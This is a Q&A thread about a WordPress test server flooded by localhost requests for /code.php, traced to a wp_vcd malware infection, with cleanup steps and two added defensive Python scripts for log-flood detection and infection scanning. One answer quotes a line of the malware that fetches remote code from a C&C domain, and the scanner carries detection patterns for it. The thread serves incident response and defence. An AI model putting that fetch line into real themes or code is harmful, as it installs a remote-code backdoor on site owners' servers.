
I recently set up an Ubuntu 18 testing server on a cloud VPS host and installed the latest WordPress. Today I went to log in and the site will not load: I get the error "Error establishing a database connection".

I went through some troubleshooting - added a swap file and blocked XML RPC requests in my .htaccess file, but still I cannot get the site to load. Looking at the apache2/access.log file, I noticed the following:

    sudo tail -f /var/log/apache2/access.log
    127.0.0.1 - - [06/Nov/2019:21:02:31 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"
    127.0.0.1 - - [06/Nov/2019:21:02:31 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"
    127.0.0.1 - - [06/Nov/2019:21:02:36 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"
    127.0.0.1 - - [06/Nov/2019:21:02:37 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"
    127.0.0.1 - - [06/Nov/2019:21:02:34 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"
    127.0.0.1 - - [06/Nov/2019:21:02:36 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"

There are thousands of these requests...also, some POST requests:

    127.0.0.1 - - [06/Nov/2019:20:48:19 +0000] "POST /wp-cron.php?doing_wp_cron=1573073189.0748620033264160156250 HTTP/1.1" 200 166 "http://DOMAIN-REDACTED/wp-cron.php?doing_wp_cron=1573073189.0748620033264160156250" "WordPress/5.2.4; http://DOMAIN REDACTED"

Can anyone help me track down the source of these connections? I ran several rootkit scanners on the server and didn't find anything. I've been combing through the web directory looking for anything strange but haven't found anything yet. Googling for code.php is useless. I currently have shut down the Apache service until I can figure out what is up.

PS: This is a test server, I can easily blow it away and create a new one, but I'd really like to do some troubleshooting here and see if I can figure out what the issue is...thanks!
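One way to quantify what the access.log excerpt shows, as an added example that is not part of the question or either answer: the script below parses Apache combined-format lines, groups them by client address, method, path and status, and flags any group that exceeds a hit threshold inside a short time window. The sample input is the lines quoted above plus one ordinary request constructed for contrast; the 60-second window and threshold of 5 are assumed values, not something the thread specifies.

```python
"""Flag request floods in Apache combined-format access logs.

Added example for the thread above, not code from the question or answers.
Groups requests by (client, method, path, status) and reports groups with
more than `threshold` hits inside any `window_seconds` span.
"""
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Sample input: the lines quoted in the question, plus one constructed normal request.
SAMPLE_LOG = [
    '127.0.0.1 - - [06/Nov/2019:21:02:31 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"',
    '127.0.0.1 - - [06/Nov/2019:21:02:31 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"',
    '127.0.0.1 - - [06/Nov/2019:21:02:36 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"',
    '127.0.0.1 - - [06/Nov/2019:21:02:37 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"',
    '127.0.0.1 - - [06/Nov/2019:21:02:34 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"',
    '127.0.0.1 - - [06/Nov/2019:21:02:36 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"',
    '127.0.0.1 - - [06/Nov/2019:20:48:19 +0000] "POST /wp-cron.php?doing_wp_cron=1573073189.0748620033264160156250 HTTP/1.1" 200 166 "http://DOMAIN-REDACTED/wp-cron.php?doing_wp_cron=1573073189.0748620033264160156250" "WordPress/5.2.4; http://DOMAIN REDACTED"',
    # constructed: an ordinary external login-page hit for contrast
    '203.0.113.7 - - [06/Nov/2019:21:03:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2731 "-" "Mozilla/5.0 (constructed)"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    # Drop the query string so every wp-cron.php?doing_wp_cron=... hit lands in one bucket
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec


def find_floods(lines, window_seconds=60, threshold=5):
    """Return {(ip, method, path, status): total hits} for every group that has
    more than `threshold` requests inside some `window_seconds` window."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            buckets[(rec["ip"], rec["method"], rec["path"], rec["status"])].append(rec["time"])

    floods = {}
    for key, times in buckets.items():
        times.sort()  # log order is not guaranteed to be chronological (see 21:02:37 before 21:02:34)
        start = 0
        for end in range(len(times)):
            # Advance the window start until the span fits inside window_seconds
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > threshold:
                floods[key] = len(times)
                break
    return floods


if __name__ == "__main__":
    for (ip, method, path, status), count in find_floods(SAMPLE_LOG).items():
        print(f"{count:>6} hits  {ip} {method} {path} -> {status}")
```

Run against a real file with `find_floods(open("/var/log/apache2/access.log"))`. A flood from 127.0.0.1 with an empty referer and user agent, all for one path, points at a process on the server itself rather than an outside client, which narrows the search to code running on the host (in this thread, the PHP that had been added to the theme).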

2 Answers

So after some searching it turns out this was a wp_vcd malware infection.

I'll add some details of how I cleaned this in case it helps anyone else.

First, I couldn't log in to the WP control panel (as soon as the server received a web request it got flooded with those GET requests from localhost and mysqld would just crash due to insufficient memory). To get around this, I renamed my theme dir to theme.disabled, which let me log in to the control panel. I installed the Sucuri plugin to do a quick scan/diff on the WP core files and found some files that didn't belong. I deleted the following:

wp-includes/wp-feed.php: This file contained a bunch of IP addresses. Apparently the malware records the IPs when users log in and suppresses the ads or whatever junk it puts on the site if one of those IPs connects to the site.

wp-includes/wp-vcd.php and wp-includes/wp-tmp.php: These contained some base64-encoded PHP code.

I also inspected my theme's functions.php and here is where I found where the calls to GET code.php were being made -- except they weren't supposed to be hitting localhost, they were supposed to be going out to some C&C server with a .pw domain. I nuked this file and restored a clean version.

At this point it looked like the site was ok and responding properly. I re-enabled the theme and installed some additional security software. I also checked the wp_users table in the database to make sure no admin users had been added. If this wasn't just a test server I'd also run this through Cloudflare or some other WAF solution for extra security.


Add an empty /code.php in the root folder,

but in the theme's functions.php

something was added at the top in a PHP block,

I deleted it.

Text search in all functions.php files for

    /code.php" or /code.php' or /code.php

    ...
    elseif ($tmpcontent = @file_get_contents("http://www.grilns.top/code.php")  ...

    //$start_wp_theme_tmp

    //wp_tmp

    //$end_wp_theme_tmp
    ?><?php
    /**
     * Theme functions and definitions
     *

Of course, I deleted the block up to

    <?php
    /**
     * Theme functions and definitions
     *

and then /code.php in the root folder may no longer be needed.
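Both answers describe the same indicators by hand: dropped files under wp-includes, a theme functions.php that fetches /code.php from an outside host, and the `$start_wp_theme_tmp` / `$end_wp_theme_tmp` comment markers with a second `<?php` opening ahead of the real theme header. The script below, an added example that is neither answerer's code nor anything from WordPress or Sucuri, checks a WordPress tree for exactly those traces so a cleanup can be verified instead of eyeballed. The fixture it builds is constructed for the demonstration; the host name in it is a placeholder, not an indicator taken from the thread.

```python
"""Scan a WordPress install for the wp-vcd traces described in the answers above.

Added example, not code from the thread, WordPress or any plugin. It reports:
  * the dropped files the first answer deleted (wp-includes/wp-vcd.php,
    wp-tmp.php, wp-feed.php) and a stray /code.php in the web root;
  * theme functions.php files that fetch /code.php, carry the
    $start_wp_theme_tmp / $end_wp_theme_tmp markers, or open a second
    "<?php" block right before the "Theme functions and definitions" header.
"""
import os
import re
import shutil
import tempfile

# Paths relative to the web root that should not exist in a clean install.
DROPPED_FILES = (
    os.path.join("wp-includes", "wp-vcd.php"),
    os.path.join("wp-includes", "wp-tmp.php"),
    os.path.join("wp-includes", "wp-feed.php"),
    "code.php",
)

# Patterns in a theme's functions.php matching what the two answers quote.
FUNCTIONS_PATTERNS = {
    "code.php fetch": re.compile(r'file_get_contents\s*\(\s*["\'][^"\']*/code\.php'),
    "wp_vcd marker": re.compile(r'\$(start|end)_wp_theme_tmp'),
    "block prepended to theme header": re.compile(r'\?>\s*<\?php\s*/\*\*\s*\*\s*Theme functions'),
}


def scan_wordpress(root):
    """Return a list of (label, path relative to root) findings."""
    findings = []
    for rel in DROPPED_FILES:
        if os.path.isfile(os.path.join(root, rel)):
            findings.append(("dropped file", rel))
    themes = os.path.join(root, "wp-content", "themes")
    for dirpath, _dirs, files in os.walk(themes):
        if "functions.php" not in files:
            continue
        path = os.path.join(dirpath, "functions.php")
        with open(path, encoding="utf-8", errors="replace") as f:
            src = f.read()
        for label, pattern in FUNCTIONS_PATTERNS.items():
            if pattern.search(src):
                findings.append((label, os.path.relpath(path, root)))
    return findings


# Constructed fixture contents. The infected variant mirrors the shape shown in
# the second answer; the host name is a placeholder (.invalid TLD), not a real C&C.
CLEAN_FUNCTIONS = "<?php\n/**\n * Theme functions and definitions\n */\n"
INFECTED_FUNCTIONS = (
    "<?php\n"
    "if ($tmpcontent = @file_get_contents(\"http://c2-placeholder.invalid/code.php\")) {}\n"
    "//$start_wp_theme_tmp\n"
    "//wp_tmp\n"
    "//$end_wp_theme_tmp\n"
    "?><?php\n"
    "/**\n * Theme functions and definitions\n */\n"
)


def build_sample_tree():
    """Create a throwaway directory laid out like the infected install (constructed)."""
    root = tempfile.mkdtemp(prefix="wp_sample_")
    for sub in ("wp-includes", "wp-content/themes/clean", "wp-content/themes/infected"):
        os.makedirs(os.path.join(root, *sub.split("/")))
    with open(os.path.join(root, "wp-includes", "wp-vcd.php"), "w") as f:
        f.write("<?php // constructed stand-in for the dropped file, not its real contents\n")
    with open(os.path.join(root, "wp-content", "themes", "clean", "functions.php"), "w") as f:
        f.write(CLEAN_FUNCTIONS)
    with open(os.path.join(root, "wp-content", "themes", "infected", "functions.php"), "w") as f:
        f.write(INFECTED_FUNCTIONS)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        for label, rel in scan_wordpress(root):
            print(f"{label}: {rel}")
    finally:
        shutil.rmtree(root)
```

Point `scan_wordpress()` at the real document root (for example `/var/www/html`) to check an install; an empty result after cleanup, together with a core-file diff like the Sucuri scan the first answer used, is a reasonable bar before re-enabling the theme.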
